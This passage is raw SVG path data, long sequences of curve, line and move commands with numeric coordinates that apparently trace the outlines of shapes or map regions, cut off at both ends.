1091.1031,364.518 1092,364.55403 C 1095.1677,364.68131 1096.7005,366.16947 1096.7867,369.20145 C 1096.8352,370.90821 1097.3517,372.59935 1097.9345,372.95954 C 1098.5173,373.31973 1099.1636,375.06926 1099.3706,376.84739 C 1099.7558,380.1557 1100.4647,381.40428 1102.0833,381.625 C 1102.5875,381.69375 1103.4154,381.80625 1103.9231,381.875 C 1105.7578,382.12345 1111,388.19902 1111,390.07692 C 1111,391.13462 1111.3375,391.94671 1111.75,391.88158 C 1114.396,391.46379 1116,392.23185 1116,393.91667 C 1116,394.97083 1116.3375,395.98333 1116.75,396.16667 C 1117.1625,396.35 1118.7375,397.99703 1120.25,399.82673 C 1121.7625,401.65642 1123,402.66892 1123,402.07673 C 1123,401.48453 1123.4217,401 1123.9371,401 C 1124.4526,401 1124.6234,402.54592 1124.3168,404.43537 C 1124.0102,406.32483 1124.263,409.31578 1124.8787,411.08194 C 1125.6126,413.18709 1125.6886,415.5343 1125.0994,417.89657 C 1124.605,419.87846 1123.9267,422.71839 1123.5919,424.20754 C 1123.2571,425.69668 1121.869,428.17168 1120.5071,429.70754 C 1116.2374,434.52284 1116,434.8784 1116,436.45779 C 1116,437.30601 1115.6139,438 1115.1421,438 C 1114.6702,438 1113.8827,439.88396 1113.3921,442.18657 C 1112.5443,446.16539 1112.2528,446.4361 1107.5193,447.64181 C 1104.7799,448.33958 1102.0796,449.53828 1101.5185,450.30559 C 1100.6568,451.48406 1099.9008,451.4938 1096.6499,450.36831 z M 1071.5047,437.99233 C 1071.8473,437.43811 1071.3645,436.2216 1070.4318,435.28897 C 1068.8376,433.69472 1068.7764,433.72022 1069.4096,435.71531 C 1069.9034,437.27086 1069.6049,437.96156 1068.2916,438.30267 C 1066.8572,438.67522 1066.9368,438.79113 1068.691,438.884 C 1069.896,438.9478 1071.1622,438.54655 1071.5047,437.99233 z M 1051,356 C 1051,355.45 1050.325,355 1049.5,355 C 1048.675,355 1048,355.45 1048,356 C 1048,356.55 1048.675,357 1049.5,357 C 1050.325,357 1051,356.55 1051,356 z M 652.96917,435.77766 C 649.87431,434.54307 647.39109,429.99436 649.20124,428.87563 C 650.63615,427.98881 645.96216,418.10148 642.01692,413.67795 C 639.43938,410.78793 636.98636,403.25707 636.57534,396.9721 C 636.35982,393.67659 633.22257,387.08627 628.87224,380.79049 C 627.84251,379.30026 627,376.56944 627,374.72199 C 627,369.70441 629.86208,360.72766 632.06379,358.83971 C 634.36757,356.86422 634.54888,353.28659 632.54131,349.41699 C 631.57029,347.54534 631.40924,346.21183 632.05958,345.42821 C 632.71753,344.63543 632.32254,342.65902 630.84995,339.37552 C 629.64733,336.69399 628.58774,334.275 628.49532,334 C 627.57634,331.26577 626.07623,329.16201 622.53623,325.64297 C 617.9887,321.12237 615.39484,316.36839 617.15561,315.78146 C 617.73447,315.58851 618.35237,314.09625 618.52873,312.46532 C 618.70509,310.83439 619.29514,308.06095 619.83994,306.30211 C 620.58082,303.91026 620.50321,302.83259 619.53203,302.02658 C 618.57069,301.22874 618.07526,301.36148 617.62385,302.53786 C 617.2885,303.41176 616.52174,303.82245 615.91993,303.45051 C 615.132,302.96355 615.13002,302.46998 615.91287,301.68713 C 618.11674,299.48326 616.93052,298.75156 612.17625,299.38223 C 607.4556,300.00845 607.28318,299.93585 604.10866,295.98559 C 600.88719,291.9769 600.82905,291.95369 595.6824,292.62192 C 592.83208,292.992 590.275,293.58483 590,293.93933 C 589.55222,294.51656 585.66093,295.81726 579.26386,297.52798 C 577.43645,298.01667 576.72716,297.4957 575.38337,294.67774 C 573.94894,291.66971 573.9163,290.8638 575.12773,288.36476 C 577.54616,283.3758 574.97886,278.1128 571.52504,280.97922 C 570.66494,281.69304 569.81389,281.45183 568.64828,280.16385 C 567.03862,278.38519 563.73344,277.93323 562.36238,279.30429 C 561.98928,279.67739 561.12018,279.5147 560.43104,278.94277 C 558.66534,277.47737 557.94535,279.14891 558.86349,282.58198 C 559.43451,284.71707 559.13041,286.35953 557.72218,288.7463 C 556.26742,291.21193 556.13142,292 557.16068,292 C 559.11382,292 561.08731,295.6089 560.2819,297.70776 C 559.63396,299.39627 559.7357,299.4032 562.13122,297.83359 C 565.18874,295.83023 573.52114,294.41617 574.3515,295.75973 C 574.68186,296.29426 573.95676,296.52323 572.69655,296.28232 C 571.46294,296.0465 568.43905,296.5907 565.97681,297.49164 C 563.51456,298.39259 560.91917,299.21303 560.20926,299.31486 C 559.49935,299.41669 554.66789,296.8 549.47269,293.5 C 541.62181,288.51312 539.8446,286.90902 538.94747,284 C 538.25666,281.75999 535.94114,278.88002 532.51543,276 C 527.84118,272.07034 527.15246,271.02074 527.08139,267.71862 C 527.03217,265.43211 526.43758,263.72141 525.57732,263.3913 C 524.40789,262.94254 524.47311,262.52689 525.94374,261.05626 C 528.86768,258.13232 529.80617,243.10206 527.12071,242.2069 C 524.64578,241.38193 526.15078,237.25456 532.68511,226.94692 C 536.95394,220.21302 540.40096,216 541.6417,216 C 542.33362,216 544.97234,214.60122 547.50551,212.8916 C 551.48781,210.20398 552.03471,209.42561 551.54558,207.1416 C 550.76003,203.47346 554.19404,198.2347 558.5873,196.39908 C 562.83631,194.62373 565.3382,189.83638 563.79129,186.44128 C 562.92764,184.54577 562.21788,184.33383 558.23657,184.78258 C 554.41995,185.21277 553.76846,185.04576 554.26057,183.76334 C 554.58428,182.91979 554.16901,181.25861 553.33777,180.07184 C 552.32626,178.62772 552.14766,177.51488 552.79773,176.70704 C 554.44599,174.65879 555.07236,169.65688 554.09993,166.30831 C 553.28624,163.50637 553.46723,162.92388 555.58211,161.53815 C 556.9071,160.66999 559.00566,160.19377 560.24558,160.47987 C 561.48551,160.76597 566.45387,161.19946 571.28637,161.44317 L 580.07275,161.88627 L 580.65813,158.95937 C 581.0202,157.14898 581.67389,156.29023 582.37175,156.70819 C 582.99229,157.07984 582.8824,156.62254 582.12756,155.69196 C 581.37271,154.76138 581.06983,154 581.45448,154 C 583.41162,154 575.80959,148.00784 572.89395,147.25233 C 568.28161,146.05715 567.87198,143.3965 572.19995,142.74469 C 574.01498,142.47135 575.63408,142.59419 575.79795,143.01769 C 575.96182,143.44119 576.92204,143.57164 577.93177,143.30759 C 579.20592,142.97439 579.60544,142.20722 579.23752,140.80026 C 578.75738,138.96421 578.9234,138.88864 580.99802,139.99894 C 584.168,141.69546 591,139.51363 591,136.80476 C 591,135.26964 590.65403,135.11479 589.09196,135.95078 C 588.04254,136.51242 584.21754,137.03626 580.59196,137.11487 C 576.96638,137.19349 574,137.60768 574,138.03529 C 574,138.4629 573.0976,138.57678 571.99467,138.28836 C 570.89174,137.99993 569.35681,138.28891 568.5837,138.93053 C 567.66942,139.68932 566.96101,139.74593 566.55716,139.09249 C 566.21567,138.53995 567.07174,137.34387 568.45955,136.43455 C 569.84735,135.52522 570.7306,134.37311 570.42232,133.8743 C 570.11403,133.37549 569.47399,133.20706 569,133.5 C 568.52601,133.79294 567.8793,133.61372 567.56287,133.10172 C 567.24644,132.58973 568.22784,131.71791 569.74377,131.16436 C 571.47658,130.53161 571.8502,130.12858 570.75,130.07895 C 568.82787,129.99223 568.74458,129.82919 569.5501,127.73004 C 569.89781,126.82392 571.00156,126.4688 572.5501,126.76483 C 575.58138,127.34429 575.69898,125.92306 572.82811,123.40499 C 571.63356,122.35724 570.95598,122.01535 571.32236,122.64522 C 571.68875,123.27508 571.29273,124.05743 570.44232,124.38376 C 569.59191,124.71009 569.14191,124.5794 569.44232,124.09333 C 569.74273,123.60726 569.28758,122.94059 568.43087,122.61185 C 567.55975,122.27757 567.18964,121.50217 567.59113,120.85255 C 568.04781,120.11363 567.87128,119.96152 567.10595,120.43452 C 566.22567,120.97856 566.19724,121.53274 567,122.5 C 567.79741,123.46083 567.79229,124.01034 566.98125,124.51159 C 566.33387,124.91169 565.63476,124.31931 565.31606,123.10062 C 564.62864,120.4719 563.59854,120.46696 559.38318,123.0722 C 557.32384,124.34494 555.25528,124.89841 554.02144,124.50681 C 552.47577,124.01623 552.15109,124.23015 552.61328,125.43461 C 552.94366,126.29557 553.95333,127.03163 554.85699,127.07029 C 556.13993,127.12517 556.06169,127.32892 554.5,128 C 552.5,128.85943 552.5,128.85943 554.5,129.04572 C 556.2063,129.20465 556.24301,129.29916 554.75,129.68933 C 553.7875,129.94085 553,130.84114 553,131.68996 C 553,132.83416 553.58185,133.04962 555.25,132.52314 C 556.4875,132.13258 558.72302,131.58114 560.21783,131.29773 C 564.40251,130.50434 565.34613,128.70511 562.99768,125.99732 C 560.54177,123.16563 560.53761,123.06632 562.90076,123.6843 C 565.13655,124.26897 566.13831,128.11609 564.58548,130.15425 C 563.34114,131.78749 556.49925,134 552.693,134 C 549.31072,134 548.20397,132.05524 550.59235,130.30881 C 551.94703,129.31825 552.14973,128.71057 551.30055,128.18575 C 549.42304,127.02539 550.44835,123.53457 552.7679,123.18997 C 553.91567,123.01945 555.39254,122.23195 556.04982,121.43997 C 556.70711,120.64798 558.50229,120 560.03911,120 C 561.57593,120 563.06157,119.4375 563.34054,118.75 C 563.72223,117.80932 564.11025,117.87119 564.90856,119 C 565.82396,120.29439 565.97147,120.26012 565.98469,118.75 C 565.99311,117.7875 565.325,117 564.5,117 C 563.675,117 563,116.55 563,116 C 563,115.45 563.55013,115 564.22251,115 C 564.89488,115 564.44488,114.29948 563.22251,113.4433 C 562.00013,112.58711 561,111.44799 561,110.91191 C 561,109.24976 564.15144,108.63187 565.11922,110.10428 C 565.87981,111.26147 566.21286,111.20092 567.06799,109.75 C 567.66908,108.7301 569.29548,108 570.96636,108 C 572.54319,108 574.00989,107.47033 574.22568,106.82295 C 574.44514,106.16458 575.16426,105.98348 575.85758,106.41198 C 576.80407,106.99694 576.82243,107.50903 575.93525,108.57802 C 575.29623,109.348 574.37035,109.72889 573.87774,109.42444 C 572.30991,108.45547 569.125,110.0308 568.46822,112.10012 C 568.11096,113.22575 568.49671,115.10914 569.35183,116.41421 C 570.48377,118.14177 570.5811,119.0189 569.73476,119.86524 C 568.88841,120.71159 569.60395,121.02007 572.55,121.07895 C 574.7225,121.12237 575.9375,121.38487 575.25,121.66228 C 573.53815,122.35303 573.6705,124 575.43785,124 C 576.25925,124 576.81111,124.85746 576.72505,126 C 576.62042,127.3889 575.85751,128 574.22818,128 C 572.85304,128 572.14897,128.43202 572.52707,129.0438 C 572.88188,129.6179 572.67195,130.69035 572.06057,131.42702 C 570.47666,133.33552 573.5043,134.33411 576.32244,132.83269 C 578.29026,131.7843 578.36781,131.83281 577.12756,133.33628 C 576.37271,134.25133 574.93677,135 573.93657,135 C 572.93638,135 571.81012,135.49821 571.43379,136.10713 C 570.96707,136.8623 571.46938,136.9858 573.01381,136.49562 C 574.25916,136.10036 578.17581,135.79368 581.71749,135.81412 C 586.95378,135.84432 588.05251,135.57922 587.59816,134.39521 C 587.24892,133.4851 587.9694,132.51543 589.51971,131.80907 C 592.8286,130.30143 592.67523,128.77777 589.25492,129.17843 C 587.34752,129.40187 586.50097,129.04226 586.48079,128 C 586.46482,127.175 585.73283,126.55288 584.85414,126.61751 C 583.76471,126.69764 583.41187,126.14099 583.7449,124.86751 C 584.06652,123.63763 583.7043,123 582.68402,123 C 581.83194,123 580.84913,122.1 580.5,121 C 580.15087,119.9 579.33305,118.93146 578.68261,118.84769 C 578.03218,118.76391 577.05,118.59082 576.5,118.46304 C 575.95,118.33525 574.6,118.15718 573.5,118.06732 C 571.9409,117.93995 572.25555,117.52874 574.92735,116.20197 C 580.15525,113.60588 579.99916,112.03379 574.56409,112.54327 C 572.05384,112.77858 570,112.57575 570,112.09254 C 570,110.68908 573.14116,109.87226 574.42878,110.9409 C 575.07519,111.47737 576.59316,111.65765 577.80204,111.34152 C 580.24508,110.70265 580.6412,112.00042 578.8692,114.83783 C 577.90537,116.38117 578.56978,117.48657 583.36897,122.32426 C 586.46577,125.44592 589.64808,128 590.44075,128 C 592.7655,128 593.32606,129.98223 591.55479,131.93946 C 590.04266,133.61034 590.04139,133.80191 591.53862,134.37644 C 592.43234,134.7194 593.81999,135 594.62228,135 C 595.42457,135 597.36998,135.953 598.94542,137.11777 C 600.52087,138.28255 602.25549,138.96013 602.80015,138.62352 C 603.3448,138.2869 604.09285,138.7964 604.46246,139.75574 C 605.0843,141.36972 605.2161,141.35459 606.22704,139.55326 C 607.03944,138.10568 607.0115,137.50383 606.11805,137.20602 C 605.24545,136.91515 605.21322,136.44801 606.00033,135.4996 C 606.88216,134.43706 606.30119,134.36961 602.88288,135.13765 C 597.5795,136.32924 595.70073,134.89742 599.3931,132.47809 C 600.82689,131.53863 602,130.19162 602,129.48473 C 602,128.32477 609.30483,125.97048 614.5,125.45606 C 615.66053,125.34115 616.34168,124.6792 616.12281,123.87901 C 615.91535,123.12056 615.72785,121.9375 615.70614,121.25 C 615.68443,120.5625 615.29167,120 614.83333,120 C 613.52293,120 613.86059,115.35396 615.25,114.26688 C 615.9375,113.72897 617.4,113.04992 618.5,112.75789 C 619.6,112.46585 621.26486,111.9114 622.19968,111.52578 C 623.57121,110.96 623.81671,111.28039 623.47129,113.18527 C 622.86072,116.55239 626.26754,118.62644 629.12332,116.62618 L 631.17383,115.18995 L 629.13251,114.54206 C 628.00978,114.18572 626.52974,112.34151 625.84353,110.44383 C 624.5079,106.75021 623.06738,106.59017 618.28518,109.60413 C 614.89241,111.7424 608.38363,111.38363 605.92268,108.92268 C 604.7417,107.7417 604.10191,106.17681 604.43993,105.29593 C 604.76695,104.44375 604.5422,103.15331 603.94049,102.42829 C 602.29571,100.44646 603.21411,96.574973 605.42928,96.152366 C 606.49038,95.949929 607.98502,95.157832 608.75071,94.39215 C 609.51639,93.626467 610.79182,93 611.585,93 C 613.01661,93 613.72862,92.716343 619.5,89.846778 C 625.49699,86.865035 627.53646,85.439519 630.36863,82.25 C 631.95586,80.4625 633.68876,79 634.21952,79 C 634.75028,79 636.2827,78.136189 637.62489,77.08042 L 640.06524,75.160841 L 636.37496,75.453647 L 632.68467,75.746453 L 635.09234,73.895463 C 636.41655,72.877418 638.4,71.967839 639.5,71.874176 C 643.65179,71.52066 644.55331,71.355868 646.5,70.594622 C 651.5374,68.624766 653.71086,68.106326 656.5,68.209308 C 659.76803,68.329972 662.21618,67.838334 663,66.903972 C 664.07173,65.626409 669,64.96883 669,66.103393 C 669,66.886975 669.39194,66.929155 670.25,66.237917 C 672.19018,64.674956 677.34097,63.901447 678.94612,64.931999 C 679.83787,65.504529 681.06511,65.500336 682.1475,64.92106 C 683.6966,64.092009 687.53535,64.61575 694.89313,66.660015 C 698.16388,67.568751 694.89582,67.986668 691.13198,67.140988 C 688.85939,66.630372 687,66.556787 687,66.977467 C 687,68.06044 696.3814,69.17461 698.53657,68.347594 C 699.69531,67.902944 700.09306,68.040417 699.66267,68.736802 C 699.24539,69.411973 699.7015,69.629315 700.88576,69.319623 C 701.92445,69.048001 703.07663,69.314967 703.44616,69.912882 C 703.81569,70.510797 705.88468,71 708.04391,71 C 712.82156,71 728.58821,75.445357 730.46418,77.321321 C 734.18864,81.045782 725.29002,83.545818 713.87286,81.982592 C 709.42766,81.373959 705.53778,81.12889 705.22867,81.437994 C 704.91957,81.747097 705.69415,82 706.94996,82 C 708.76375,82 709.12239,82.423969 708.69409,84.061803 C 708.04874,86.529609 713.0238,90.036933 717,89.917315 C 719.49116,89.842371 719.4901,89.838496 716.7,88.821053 C 715.16,88.259474 714.08054,87.2825 714.30121,86.65 C 714.72594,85.43257 715.80204,85.42558 723,86.593496 C 726.9737,87.238255 727.35191,87.144265 726.23381,85.789852 C 725.15927,84.488218 725.462,84.049304 728.23381,82.89015 C 730.03021,82.138902 733.63611,81.51879 736.2469,81.512123 C 739.36962,81.504148 740.99487,81.072304 740.9969,80.25 C 740.99861,79.5625 740.4949,79 739.87756,79 C 739.13562,79 739.20757,78.45482 740.08981,77.391787 C 741.22382,76.025386 741.13831,75.574306 739.52112,74.391787 C 737.79062,73.126413 738.02362,73 742.08636,73 C 744.73362,73 747.56276,73.713282 749.02749,74.75 L 751.5,76.5 L 747.5,77.060053 L 743.5,77.620107 L 747.40916,78.451203 C 750.1532,79.034593 751.94042,78.89379 753.40558,77.978785 C 756.3456,76.142711 771.88459,71.985944 775.49297,72.070285 C 777.93928,72.127464 778.13704,72.282608 776.55355,72.902281 C 774.65762,73.644224 774.66042,73.677935 776.66152,74.201234 C 777.79145,74.496717 779.52839,74.2838 780.5214,73.728086 C 781.51441,73.172372 786.03996,72.668715 790.57819,72.608848 C 796.58661,72.529588 798.57477,72.192979 797.89233,71.370515 C 797.37688,70.749298 795.61524,69.973048 793.97757,69.645515 C 790.60525,68.971049 789.92087,67 793.05902,67 C 794.36076,67 794.85561,67.424612 794.40451,68.154508 C 794.00727,68.797248 794.12612,69.040087 794.67262,68.702333 C 796.04692,67.852966 815.48875,70.652966 821.36028,72.545874 C 824.03344,73.407666 826.43498,73.898352 826.69705,73.636287 C 827.5236,72.809732 822.13862,69.796292 821.04398,70.472821 C 820.46979,70.827688 820,70.416476 820,69.559017 C 820,68.701558 820.45,68 821,68 C 821.55,68 822,67.523442 822,66.940983 C 822,66.358524 821.625,66.113729 821.16667,66.396994 C 820.70833,66.68026 820.33333,66.246567 820.33333,65.433233 C 820.33333,64.619898 821.49583,63.666188 822.91667,63.313876 C 824.3375,62.961564 826.88195,61.171815 828.571,59.336655 C 832.61658,54.941126 834.77509,54.985898 841.83102,59.611694 C 842.01308,59.731051 841.67436,60.739938 841.07832,61.853665 C 840.34913,63.216154 840.32785,64.084589 841.01326,64.508194 C 841.57352,64.854458 841.86178,66.681767 841.65382,68.568882 C 841.44586,70.455997 841.40187,72 841.55607,72 C 841.71026,72 842.61558,72.298991 843.56789,72.664425 C 845.03092,73.225843 845.19482,72.912376 844.62511,70.642466 C 844.12988,68.669306 844.37428,67.793604 845.54567,67.344101 C 846.8467,66.84485 846.64953,66.410069 844.47526,64.983772 C 843.0094,64.022181 842.1903,63.01967 842.65503,62.75597 C 844.00035,61.992607 849.41939,60.65346 850.32433,60.860739 C 850.77771,60.964587 850.85912,60.581063 850.50523,60.008465 C 850.15135,59.435866 849.4429,59.226274 848.9309,59.542705 C 848.41891,59.859136 848,59.60848 848,58.985693 C 848,58.362905 848.7875,58.007229 849.75,58.195302 C 850.76528,58.393687 851.5,59.436138 851.5,60.678268 C 851.5,61.855827 851.90965,63.197446 852.41033,63.659642 C 852.95074,64.158522 852.98567,63.923011 852.49628,63.080061 C 851.85731,61.979468 852.10238,61.829926 853.58596,62.415138 C 854.63868,62.830396 856.9625,63.415747 858.75,63.715919 C 860.5375,64.01609 862,64.70529 862,65.247474 C 862,65.789658 860.9875,65.961923 859.75,65.630286 C 858.5125,65.298649 856.29464,65.021165 854.82143,65.013655 C 853.34821,65.006145 851.45456,64.311698 850.6133,63.47044 C 849.5817,62.438843 848.21174,62.159736 846.4053,62.613124 L 843.72686,63.285369 L 846.01261,65.009511 C 848.13852,66.613091 848.17412,66.803175 846.52174,67.727897 C 843.21359,69.579231 846.03313,71.498527 852.08906,71.517635 C 856.03914,71.530098 858.18614,72.043284 859.41049,73.267635 C 860.36329,74.220436 860.68727,75 860.13045,75 C 859.57362,75 858.90134,74.649377 858.63649,74.220838 C 858.37163,73.792299 855.8211,73.340129 852.96863,73.216016 C 848.50261,73.021697 847.87056,73.220313 848.4177,74.646125 C 849.482,77.41966 841.16989,83.252643 837.27232,82.467339 C 836.29755,82.270935 833.73113,81.824782 831.56919,81.475887 C 828.82334,81.032762 828.0555,80.583731 829.02209,79.986347 C 829.78314,79.515995 831.552,79.35924 832.9529,79.638003 C 834.62094,79.969921 836.68132,79.343323 838.92291,77.822422 C 842.713,75.250869 843.98599,73 841.65026,73 C 840.48334,73 840.21941,72.065443 840.50505,68.944868 C 840.77177,66.030946 840.45936,64.729768 839.39494,64.321312 C 838.098,63.823629 838.10598,63.54038 839.45901,62.045293 C 841.61558,59.662308 840.49616,59 834.31189,59 C 829.57056,59 828.82663,59.286397 827.81805,61.5 C 827.1133,63.046757 825.85297,64 824.51268,64 C 822.67451,64 822.41308,64.454401 822.78669,67 C 823.03314,68.679142 823.83746,70 824.6135,70 C 825.37607,70 826,70.45 826,71 C 826,71.55 826.9,72 828,72 C 829.97842,72 829.9777,72.022304 827.93309,74.066912 C 826.53321,75.466791 825.48437,75.824242 824.68309,75.174531 C 823.20359,73.974899 813.18769,71.439158 806.29609,70.519468 C 800.30816,69.720374 798.27424,70.420588 800.12071,72.645452 C 800.79052,73.45252 800.92487,74.013641 800.41927,73.892387 C 799.91367,73.771133 798.2142,74.031648 796.64267,74.471309 C 794.86158,74.969597 793.5398,74.873418 793.13347,74.215962 C 792.68658,73.492873 790.44068,73.458729 785.99081,74.107373 C 779.56358,75.044249 774.7728,75.276811 768,74.980714 C 766.075,74.896556 763.15,75.38012 761.5,76.055301 C 759.85,76.730482 757.67115,77.372092 756.65812,77.481102 C 755.64508,77.590111 754.45157,78.269348 754.00586,78.990517 C 753.42519,79.930061 751.76482,80.132293 748.14828,79.703967 C 743.66649,79.173166 743.02853,79.334735 742.4536,81.146205 C 741.91093,82.85598 741.25764,83.083315 738.41788,82.550572 C 736.55434,82.20097 733.22296,82.401418 731.01482,82.99601 C 727.07106,84.057954 726.02183,85.277424 728,86.5 C 730.17146,87.842033 728.78666,88.497444 724.5,88.156512 C 720.89179,87.86954 720,88.115832 720,89.399306 C 720,90.556775 719.04721,91 716.55902,91 C 714.66648,91 712.83992,90.55 712.5,90 C 712.16008,89.45 711.05667,89 710.04797,89 C 708.17397,89 706.52143,86.506491 706.88968,84.23448 C 707.0025,83.538444 705.74647,82.699295 704.09852,82.369703 C 702.45056,82.040112 700.29173,80.862291 699.30112,79.752322 C 697.54942,77.789575 697.55955,77.752719 699.67011,78.409132 C 707.33461,80.79289 721.55572,82.196719 725.97752,81.006054 C 731.65115,79.478304 730.89744,76.761994 724.5,75.681164 C 722.85,75.402401 719.66472,74.507308 717.42161,73.692067 C 715.17849,72.876827 710.90349,72.210131 707.92161,72.210522 C 704.93972,72.210912 701.825,71.943942 701,71.617254 C 696.62996,69.88678 692.00301,70.522434 688.17643,73.378967 C 687.14834,74.14643 687.47666,74.693856 689.64705,75.831039 L 692.44125,77.295067 L 690.24252,78.754969 L 688.04379,80.214871 L 690.27189,82.08712 C 691.96428,83.509209 692.19377,84.162285 691.22637,84.803309 C 690.24696,85.452282 690.41478,86.065397 691.95278,87.457271 C 693.05281,88.452783 693.70412,89.669724 693.40014,90.161584 C 693.09615,90.653444 693.88617,91.896988 695.15573,92.925017 L 697.46402,94.794159 L 692.25611,98.031571 C 686.87768,101.37499 686.32261,103 690.55902,103 C 691.90156,103 693,103.50248 693,104.11663 C 693,104.77107 692.09923,104.99771 690.82381,104.66418 C 689.6034,104.34503 687.38356,104.84178 685.76955,105.7952 C 683.26657,107.27375 682.95535,107.95184 683.38147,110.99837 C 684.27409,117.38007 684.82808,118 689.63837,118 C 692.97941,118 694.19518,118.42851 694.60354,119.75 C 695.6719,123.20739 696.73005,124.52274 699.59224,125.95131 L 702.5,127.40263 L 699.75,128.39436 C 695.28558,130.00435 696.33369,131.82943 701.39509,131.25894 C 705.22233,130.82755 705.87704,131.03722 706.46248,132.88177 C 706.84176,134.0768 707.97708,135 709.06739,135 C 710.13032,135 711,135.63017 711,136.40039 C 711,137.36671 712.00737,137.72058 714.25,137.54207 C 716.0375,137.39978 717.9684,137.64661 718.54089,138.09058 C 719.11338,138.53455 721.13838,139.17076 723.04089,139.50438 C 727.20203,140.23407 729.04554,141.73578 727.18885,142.88328 C 726.47692,143.32328 725.97147,144.09204 726.06563,144.59164 C 726.40957,146.41645 725.9789,148 725.13867,148 C 723.95774,148 725.03395,142.67624 726.39903,141.76531 C 727.01669,141.35314 726.40253,141.0212 725,141.00915 C 723.625,140.99734 721.36458,140.39509 719.97683,139.67083 C 718.58909,138.94656 715.97108,138.45662 714.15903,138.58207 C 712.08211,138.72586 710.6651,138.29083 710.3252,137.40508 C 710.02865,136.63229 709.18468,136 708.44972,136 C 707.71475,136 706.46713,135.07731 705.67723,133.94957 C 704.42382,132.16008 703.58941,131.98558 699.12053,132.5784 C 696.30424,132.95199 694,133.65741 694,134.14598 C 694,135.0745 685.19149,134.69133 678.75657,133.48288 C 673.34059,132.46579 669.72662,133.56329 670.49718,135.99112 C 670.91178,137.29741 670.44819,138.32766 669.054,139.19835 C 667.9243,139.90386 667,141.04785 667,141.74055 C 667,142.43325 666.5125,143 665.91667,143 C 664.07788,143 665.49098,145.30442 667.55421,145.67042 C 671.7316,146.41145 677.06982,146.18785 678.25541,145.22219 C 680.17281,143.66046 687.31112,144.6871 688.69854,146.72413 C 691.8115,151.29464 692.97392,151.89556 695.82275,150.40702 C 698.145,149.19363 698.64722,149.2065 699.61024,150.50407 C 700.22088,151.32683 701.68338,152 702.86024,152 C 705.45747,152 705.57369,152.80928 703.25,154.71391 C 702.2875,155.50283 702.06568,155.86142 702.75706,155.51078 C 703.44845,155.16013 704.25849,155.51005 704.55716,156.28837 C 704.90716,157.20046 706.01543,157.52854 707.67486,157.21132 C 709.82271,156.80074 709.98018,156.56841 708.62476,155.80988 C 704.78942,153.66352 707.77642,151.06397 715.94335,149.4406 C 717.83719,149.06416 720.00684,148.13602 720.76478,147.37808 C 721.52272,146.62013 722.63571,146 723.2381,146 C 723.84048,146 724.03724,146.2961 723.67534,146.65799 C 723.31345,147.01989 723.57595,148.00627 724.25868,148.84995 C 725.03162,149.80512 725.0711,150.12698 724.36331,149.70297 C 723.73813,149.32845 722.67053,149.69207 721.99086,150.51101 C 721.3112,151.32995 721.0959,152 721.51241,152 C 721.92893,152 721.07181,152.94228 719.60769,154.09395 L 716.94567,156.1879 L 720.72283,158.19105 C 722.80028,159.29278 726.075,160.62606 728,161.15389 C 737.89666,163.86752 739.70931,164.24688 742.16887,164.11917 C 743.63675,164.04295 745.43851,164.54746 746.1728,165.2403 C 746.90708,165.93313 748.37997,167.175 749.44588,168 C 751.16858,169.33333 751.28793,169.33333 750.52006,168 C 749.93781,166.98897 750.33184,167.0917 751.72883,168.31514 C 754.59909,170.82885 755.54625,168.82821 753.41569,164.75205 C 752.48079,162.96342 751.38653,160.825 750.98399,160 C 750.14975,158.29024 753.45224,153 755.35381,153 C 756.0235,153 756.57143,152.06946 756.57143,150.93214 C 756.57143,149.50521 755.76555,148.70311 753.97139,148.34428 C 751.15539,147.78108 748.42155,144.47553 749.9768,143.51434 C 750.49152,143.19622 750.6636,142.28693 750.3592,141.49367 C 749.5262,139.32291 752.27032,137.01214 754.3194,138.15887 C 755.24373,138.67615 756,138.70988 756,138.23383 C 756,137.75778 757.84201,136.33302 760.09335,135.06769 C 763.52305,133.14009 765.01866,132.87747 769.31835,133.44784 C 772.14076,133.82225 774.94117,134.53621 775.54148,135.03442 C 776.14178,135.53263 777.95303,135.9321 779.56647,135.92211 C 781.17991,135.91213 784.75,135.88243 787.5,135.85612 C 790.25,135.8298 794.18419,136.03879 796.24265,136.32054 C 800.73176,136.93499 802.11827,135.46664 798.57388,133.85171 C 796.30456,132.81774 796.20897,132.56768 797.67361,131.49671 C 798.57486,130.8377 799.39032,129.23872 799.48575,127.94343 C 799.63904,125.86276 800.42854,125.44636 806.26141,124.36983 C 809.8926,123.69965 815.0839,122.90409 817.79764,122.60192 C 820.51137,122.29974 823.95713,121.5866 825.45488,121.01715 C 829.1824,119.59995 834.18994,120.10569 836,122.08216 C 837.74315,123.98556 848.22203,126.59884 849.9152,125.55241 C 850.54767,125.16152 852.37107,124.46717 853.96721,124.00941 C 856.20135,123.36866 856.75259,123.48116 856.36231,124.49821 C 856.07717,125.24128 856.75429,126.10463 857.90988,126.4714 C 859.03987,126.83004 861.3987,129.12069 863.15172,131.56174 C 866.41745,136.10919 867.41756,136.75142 868.50167,134.9973 C 868.91015,134.33636 869.82402,134.37064 871.18286,135.09786 C 872.31667,135.70466 874.57483,135.93503 876.201,135.6098 C 878.43201,135.1636 879.97712,135.6435 882.49658,137.56519 C 884.33298,138.96588 886.88501,140.16634 888.16775,140.23287 C 889.45049,140.2994 891.04091,140.7614 891.70201,141.25954 C 893.07435,142.29358 895.38079,141.68971 902.57596,138.41253 C 907.73574,136.06242 914.85621,135.81036 917.37047,137.88882 C 918.35238,138.70053 924.75909,139.37147 928.86663,139.09274 C 929.70992,139.03551 930.03992,138.26067 929.72838,137.06933 C 929.41644,135.87645 930.0727,134.34087 931.44573,133.05099 C 933.54019,131.08334 933.87687,131.05061 937.30186,132.48166 C 939.30051,133.31675 941.74197,134 942.72733,134 C 943.7127,134 945.11715,134.95794 945.84834,136.12876 C 947.01732,138.00059 947.79572,138.18434 952.29761,137.65116 C 957.39318,137.04766 964.88337,138.50544 966.14905,140.34699 C 967.40811,142.17891 980.81704,141.23865 984.94597,139.02891 C 987.08232,137.88558 995.06233,138.47963 997.88997,139.99249 C 999.93225,141.08517 1003.8488,138.68671 1006.5761,134.67326 C 1008.2557,132.20141 1008.5998,131.02087 1007.7332,130.70274 C 1005.2499,129.79108 1008.8806,127.65676 1014.0408,126.99476 C 1019.8723,126.24666 1026.859,127.71618 1029.3596,130.21676 C 1030.3011,131.15825 1031.009,132.05714 1030.9327,132.21429 C 1030.8564,132.37143 1031.5986,134.1875 1032.5822,136.25 C 1033.7285,138.65396 1035.0573,140 1036.2841,140 C 1039.3747,140 1045.2418,143.20856 1045.7575,145.1808 C 1046.3132,147.30558 1047.4987,147.40684 1053.659,145.85566 C 1058.9743,144.51724 1060.8943,145.93266 1058.135,149.15533 C 1057.2357,150.20556 1056.4967,151.38775 1056.4927,151.78242 C 1056.4722,153.79572 1052.9867,157.20886 1051.5242,156.64767 C 